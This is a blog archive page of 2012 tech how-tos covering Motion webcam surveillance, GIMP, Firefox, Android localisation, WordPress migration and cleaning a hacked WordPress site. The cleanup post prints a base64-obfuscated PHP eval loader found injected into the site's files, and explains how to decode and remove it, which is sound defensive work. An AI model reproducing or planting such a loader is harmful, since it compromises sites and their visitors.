Archive for March, 2012

Surveillance system with Motion

There is a time when you are leaving your home empty and you don’t have an expensive security and alarm system. You need to be protected and be aware if there are any changes or visits that you do not approve of while you are gone. There is an easy way to achieve just that with Motion. What you need is:

  1. Linux OS (ex. Ubuntu)
  2. Motion (free)
  3. Webcam
  4. Internet (optional)
  5. Hosting (optional)
  6. Smartphone with data plan (optional)

After you have your computer ready, webcam installed and working, go and download the Motion project or use Ubuntu’s apt to get it (check to get the latest version):

sudo apt-get install motion

Run the program (Motion) with root privileges, like sudo motion, however please note that you should probably run it with sleep or cron, otherwise it will activate immediately and most probably detect you while you are exiting the room.

Now you are all set for the basic surveillance with just a webcam which will record when there is a movement in front of the camera, however there are some more advanced options which could help a lot.

Email you when there is movement detected

For this you will need to install sendmail and mutt, assuming you are on Ubuntu

sudo apt-get install sendmail mutt

The basic settings for sendmail are enough for most users, but if you are an advanced user feel free to modify it as you desire.

Open the file /etc/motion/motion.conf in your favorite text editor (ex. vim), then locate the text on_even_start value and change the value part with:

echo "This is the body of the message" | mutt -s "Motion has been detected" your@mail.com

If there is a ; (semi-colon) on the beginning of the row, remove it, also if there is any empty space before the on_event_start.

Sending images to a webserver

It would be good to have the images taken from the motion to a webserver so that you can check from a remote location what is there on the images and report to the police if needed.
Open the /etc/motion/motion.conf file again in a text editor and locate the text on_picture_save value and change the value part with:

scp %f user@yourdomain.com:/path/for/images/

If there is a ; (semi-colon) on the beginning of the row, remove it, also if there is any empty space before the on_picture_save.

Enable login without password on your webserver

You need to create a ssh key on your machine with the following

sudo ssh-keygen -t dsa

Upload the key to your webserver:

sudo ssh-copy-id -i /root/.ssh/id_dsa.pub user@yourdomain.com

Tips and tricks: if you have a LED light on your camera, put a plastic electrician tape (isolation tape) on it so that the camera is not noticeable. Also, make sure you have some light in the room, unless the camera has a feature for night vision.

Making rounded corners in GIMP

I bugged myself a little to create an image in GIMP which will have rounded corners. I tried with selection tools and everything else I could think of to no avail. Then I browsed trough the Filters selections and I found the script Round Corners. The image I created was initially like this (you can also import a picture):

Looks kinda dull and boring, so now we will make it with round edges and make it more interesting 🙂

Click on the Filters -> Decor -> Round Corners… and a new window with settings will be shown.

NOTE: if the filter Round Corners is grayed-out and you cannot select it, it means that the image has Alpha channel, so you need to remove that. Go to Layer -> Transparency -> Remove Alpha Channel

The window with the settings should look like this

The default settings might not work for everybody, so you can test it how it transforms and what you need.

The options are pretty much self explanatory, so for example if you do not want any shadows just set the Shadow X/Y offset to 0, Work on copy will create a new file and will not modify the original, Add Background will put the new image on a background etc.

The default settings will generate an image like this

You can see the rounded edges, the shadow, the blur on the shadow and the background (white). Now the image looks much slicker and more modern.

Let me know if you have questions about this in the comments below.

Change default search engine in Firefox (in address bar)

The default search engine in Firefox is Google. There is a way to change it to whichever search engine you wish. In this post I will talk for transferring the default search from Google to DuckDuckGo. I am experimenting with DDG now and seeing if it will suit my needs better than Google.

Instant Search

For the instant search () you can easily add new search engines or select one on the go, there is even a GUI which will help you add new ones, remove and edit them

When you are on a website that offers search services, you will see a new entry “Add <site>” in the instant search list of engines, click it and it will be added automatically. So visit https://www.duckduckgo.com/ now to add it if you wish.

Default Search in Address Bar

The default search is the address bar (), instead of typing a URL, you type a search query and hit enter. The search query is then passed to your default search engine and the results are displayed on their website.

There is a way to modify the default search engine in Firefox, start by typing this in the address bar:

about:config

agree to the warning and in the search field enter the following:

browser.search.defaultenginename

It should show one row and the Value field should be Google. Double click on it, and enter the value of your desired default search engine (in this case DuckDuckGo).

Click OK and you are good to go.

Note: The search engine that you want to make as your default must be in the Instant Search list.

This is good for productivity if you are using multiple search engines, you can set them on each and search faster without distractions.

How to clean malware infected WordPress blogs

Yes, that happened to me. I had a pretty old version of WordPress for one website and it got attacked by somebody. From what I could tell it was an automated attack and it infected most of the .php files for the same user on the hosting.

How I found out about that was when I opened the website in Chrome a warning was shown instead of the website:

 

Note: You can also perform a free scan via Sucuri which will confirm if your website is infected and it also offers ways to clean it up.

The following will be reported if infected:

Don’t panic, investigate!

First thing I did is panic. After panicking for ~5 minutes I realized that I should calm down and start investigating the issue and how many of my websites are affected. I opened all of them in Chrome and only 3 were infected. I opened the source code to see what the code looks like that is causing problems. Note: DO NOT OPEN THE INFECTED LINK, it will infect your machine (especially if you are on Windows).

The code was a path to the infested website enclosed in <script> tags. Nothing was shown in Firefox though, that is why I didn’t see the problem earlier. I assume Firefox has some built-in protection against scripts to external hosts.

Next step was to open the .php files on my server and see the code that is producing the script to the external website. It was on top of the file and it was base64 encoded string, which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed you can decode the string and see what it actually does by using the following command:

echo "ABOVE STRING GOES HERE" | base64 -d

Echo is used for security so that nothing is executed by mistake.

Make backups

Now that we know what the issue is, make a backup from the website and the database. Don’t worry that the files are still infected, better have infected files than no files at all in case something terrible happens 🙂

Unless you already have some method to create frequent backups, use simpler method now. Delete all the unwanted themes, plugins, empty cache if using caching plugin, then login to your hosting (S/FTP) and copy all the files from your host to your local machine. Login to your database and create full export of your database schema.

Clean-up

Unless you got Sucuri to perform the cleaning for you, these are some manual steps you can perform to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner to scan your WordPress installation. It works for WordPress 3.3+ so if you have something older you will need to skip this step. If you have 3.3+, you can install it and perform a scan (in most cases default settings are good) which will inform you which files are (most likely) infected. There will be some legit decode/eval functions in the code, so you should just check for the ones that have base64 encoded strings (like explained above).

When the scan is completed you can see which files are infected and then you manually correct them.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows you can execute the following to identify which files are infected

cd backedup_folder_from_above
find . | xargs grep -i decode

This will print all the files that have the word decode in them, and you will be able to recognize the infection by being on the top of the file with base64 encoded string. If you are not sure for some files, you can always check the encoded string by using the echo method explained above.

3. Manually remove the infected code

Now that we have identified which files are infected (either by the plugin or the manual scan), it is time to clean up the website. Modify the infected files by deleting the malware lines, in the example above from /**/ to php after the encoded string. If you modify the local files on the computer, when you are finished you need to upload them on the server to the correct paths and overwrite the existing ones. Easier way would be to open the files directly from the server (via your FTP client) modify them and save the changes.

When you are done with all the files and they are successfully uploaded on your server, perform another scan with Exploit Scanner and/or manual scan (note: for this second scan you need to create a new backup from the entire website in a new location and scan there). Make sure there are no infected files left.

Final steps

Now that the site is clean there are some final steps that must be performed so that you avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins or at least the active ones
  3. Update your theme (please note, some themes when updated will overwrite all your custom code)
  4. Change your WordPress secret keys (get them here) in your wp-config.php file (more info here)
  5. Change the passwords for all the users in WordPress and make sure there are no new users created
  6. Change the password(s) on your database and change the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have modified it, it should look like this
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: there could be something else added by your hosting, plugins etc, so double check before modifying it.

After you have done all these steps, go to Sucuri again and Re-Scan your site to make sure that everything is gone. If you are clean you need to get something like this:

That would be all, now go and write some posts on your clean blog 🙂

Restore files in Windows 7

If you happen to be using Windows 7 and you delete a file by mistake (or changed your mind 😉 ), there is an easy way to restore it.

  1. Go to the folder that has the file
  2. Right click in it (on the empty surface, not on an icon)
  3. Click Properties
  4. Click the tab called Previous Versions
  5. Locate the file that you want to restore

These files are created based on when Windows is performing System Restore points so you might want to modify those settings if you are more advanced user. They are performed on every restart by default, certain periods of the day, after installing some application etc.

The above can be performed also on a file that has been modified but it is still present:

  1. Right click on the file
  2. Select Properties
  3. Click the Previous Versions tab
  4. Select the version you want to restore

This restore procedure will work on all kind of files, database files, Word documents, text files, images etc.

Add multiple language support for your Android application independent of the phone global settings

There is a way to create a multiple language application in Android and let the user choose which language to use on application level. This is very positive because not everybody wants to use the application on the system level language or they do not have a phone in their language. So the following is a way to implement application level language settings. This excerpt is used in the application when the Menu button is pressed, it will show all the options you need plus the language selection. After the language is selected, the application will restart itself in the new language.

Code snippet:

case 112: //Language Select
dialog = new Dialog(MainActivity.this);
  dialog.setContentView(R.layout.langselect);
  dialog.setCancelable(true);

  dialog.setTitle(R.string.sChooseLang);

     Button butBack = (Button) dialog.findViewById(R.id.backButton);

     butBack.setOnClickListener(new OnClickListener() {
         @Override
         public void onClick(View v) {
             dialog.dismiss();
         }
     });

 hmLocales = new HashMap<String, String>();
 hmLocales.put(getString(R.string.sMacedonian), "mk"); // Macedonian
 hmLocales.put(getString(R.string.sAlbanian), "sq"); // Albanian
 hmLocales.put(getString(R.string.sEnglish), "en"); // English
 hmLocales.put(getString(R.string.sSerbian), "sr"); // Serbian
 hmLocales.put(getString(R.string.sFrench), "fr"); // French

 lvLangs = (ListView) dialog.findViewById(R.id.lvLanguages);
 String sLanguages[] = this.getResources().getStringArray(R.array.saLanguages);
 lvLangs.setAdapter(new ArrayAdapter<String>(this,android.R.layout.simple_list_item_1 , sLanguages));                        

 dialog.show();

 lvLangs.setOnItemClickListener(new OnItemClickListener() {
    //@Override
    public void onItemClick(AdapterView<?> a, View v, int position, long id) {
        String t = (String) lvLangs.getItemAtPosition(position);
        String sLocale = hmLocales.get(t);

        MyApplication.updateLanguage(getApplicationContext(), sLocale);
        setRequestedOrientation(ActivityInfo.SCREEN_ORIENTATION_LANDSCAPE);
        setRequestedOrientation(ActivityInfo.SCREEN_ORIENTATION_SENSOR);
        dialog.dismiss();
    }
 });

 

After you have finished coding, you will need to create new folders for the translated strings based on the country/language codes that you have in your application. Based on the example above there should be  res/values, res/values-en, res/values-sq, res/values-fr and res/values-sr folders. There is no res/values-mk because the Macedonian translation would be the default and therefore it is stored in res/values. Note that the country/language codes on the folders need to match the ones in the code.

You are all set! Now get busy and translate the strings 🙂

In another post I will talk how to store the language value permanently (unless the user changes it) so that it will not reset to default on every restart of the application.

How to move your WordPress to a new domain name

As you might have noticed, there is a new domain name for this blog. Now the domain is http://redoem.com It is easier to remember and shorter than the previous one (http://blog.zasekoj.com).

The whole process took approximately 45 minutes, but yours could vary depending on the amount of posts, comments, images etc that you have.

NOTE: this is not for blogs hosted on wordpress.com. For them many of the steps will be different, but you can try and adapt the following.

OK, enough chit-chat, let’s get to work. First of all, of course, you need to buy a new domain name (I am using DreamHost – you can register as well for hosting and use coupon REDOEM30 to get 1 extra FREE lifetime domain registration and $30 off your total amount!).

  1. Create a new user in your panel (if the hosting does not do it automatically) which will have FTP access to your domain name.
  2. Remove all the junk that you do not need like spam comments pending, drafts you are not planning to use, themes that you don’t need etc. This takes additional space and there is no need to transfer it across different databases.
  3. Disable all the WordPress plugins and empty cache if you are using caching plugin
  4. Export your database
    • Login to your MySQL server (phpMyAdmin) and click on the Export tab
    • Select your database on the left of the screen (do not select the Information_Scheme database)
    • All of the settings by default should be OK, unless you are advanced user and you know what you are doing and what else you might need
    • Go to the bottom of the page and click the check box that says Save as file
    • Enter a template for your filename (the default is OK)
    • Leave the Compression set to None. It will cut few steps later
    • Click the Go button on the bottom-right and save the file to your disk
  5. Open the saved export file in a text editor which supports Find and Replace (like Notepad++, TextMate, GEdit etc)
  6. Find and replace all of the instances where your old domain name is used. NOTE: start with the longest string, for example db.olddomain.com would be replaced with db.newdomain.com, then go on to the lower lever by replacing olddomain.com to newdomain.com, and last just the domain name from olddomain to newdomain. Please be careful with this last one because it could change some of the things that you don’t want to be changed. I recommend to check which instances are they and either replace them one by one where needed or use extra filters. For example when I was doing this last bit I used /home/olddomain/ to /home/newdomain/ because that worked for me, see if such options will work for you too.
  7. If you want to change the database name, at the top of the file there should be a statement like “CREATE DATABASE namehere ….” change the name to whatever you want. Please note that later you will need this name.
  8. Save the file
  9. Login to your new MySQL Server (phpMyAdmin) for the new domain.
  10. Click Import and select the file that you modified. Click OK
  11. When the import is complete, you will receive a message stating that, if there are errors you will be informed as well. Now we will assume that it was successful.
  12. Login via (S)FTP to your olddomain where the WordPress installation is currently located
  13. Copy all the files (the wp-include, wp-content and wp-admin folders as well) from olddomain.com to your local disk (recommended) or directly to the newdomain (usually via SSH)
  14. Open the file wp-config.php in a text editor and modify the following fields:
    • define(‘DB_NAME’, ‘newdatabase’);  — this is the name from step 7
    • define(‘DB_USER’, ‘newdatabaseuser’);   — this is the user that you use to connect to the database/phpMyAdmin
    • define(‘DB_PASSWORD’, ‘newdbpass’);  — this is the password that you use to connect to the database/phpMyAdmin
    • define(‘DB_HOST’, ‘db.newdomain.com’);  — this is the hostname for the new database
  15. Transfer all the files to the newdomain.com folder
  16. Try to open the newdomain.com site — it should open successfully
  17. Reactivate all the plugins that you had previously, or the ones that you want one. Some of them might need to be re-configured to work on the new domain (SEO, Google Sitemap etc)
  18. Change any custom code that you have, like Google Analytics, Adwords etc
  19. Create a new file called .htaccess(note the dot at the beginning and no extension) for permanent redirect from the old site to the new site. This is important so that you don’t lose any traffic. However if you are losing the olddomain.com you cannot do this. Enter the following in it:
    Options +FollowSymLinks
    RewriteEngine on
    RewriteRule (.*) http://newdomain.com/$1 [R=301,L]
  20. Place the newly created file .htaccess inside the olddomain.com directory
  21. Remove all the files inside the olddomain.com directory (EXCEPT the .htaccess file that you added in step 20)
  22. Try the old site and see if the redirect works properly

Well, that was it. After all of these steps your WordPress installation should be moved to the new domain name and everything should stay the same. The redirect is very important (step 19) so make sure you keep your old domain for at least several more months after the move so that all the old traffic is redirected successfully. You can omit this step if you have a new site with very few visits, but then again I guess you can just create a new WordPress installation and do not perform the above steps 🙂

Enjoy and let me know in the comments if you have any problems.

 

Go to Top